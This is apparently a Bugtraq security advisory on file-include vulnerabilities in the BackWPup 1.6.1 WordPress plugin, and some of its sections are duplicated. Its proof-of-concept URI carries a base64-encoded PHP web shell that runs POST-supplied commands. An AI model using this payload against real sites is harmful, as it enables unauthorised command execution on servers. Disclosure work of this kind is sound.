BackWPup Plugin for WordPress 'wp_xml_export.php' Local and Remote File Include Vulnerabilities
BID:47058
Info
BackWPup Plugin for WordPress 'wp_xml_export.php' Local and Remote File Include Vulnerabilities
| Bugtraq ID: | 47058 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Mar 28 2011 12:00AM |
| Updated: | Mar 28 2011 12:00AM |
| Credit: | Phil Taylor |
| Vulnerable: |
WordPress BackWPup 1.6.1 |
| Not Vulnerable: |
WordPress BackWPup 1.7.1 |
Discussion
BackWPup Plugin for WordPress 'wp_xml_export.php' Local and Remote File Include Vulnerabilities
The BackWPup plugin for WordPress is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
BackWPup 1.6.1 is vulnerable; other versions may also be affected.
The BackWPup plugin for WordPress is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
BackWPup 1.6.1 is vulnerable; other versions may also be affected.
Exploit / POC
BackWPup Plugin for WordPress 'wp_xml_export.php' Local and Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URI is available:
http://www.example.com/_nonce=822728c8d9&wpabs=data://text/plain;base64,PGZ
vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2bIiBtZX
Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4Ij48aW5wdXQgdHlwZT0
ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF
sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d
An attacker can exploit these issues via a browser.
The following example URI is available:
http://www.example.com/_nonce=822728c8d9&wpabs=data://text/plain;base64,PGZ
vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2bIiBtZX
Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4Ij48aW5wdXQgdHlwZT0
ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF
sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d
References
BackWPup Plugin for WordPress 'wp_xml_export.php' Local and Remote File Include Vulnerabilities
References:
References: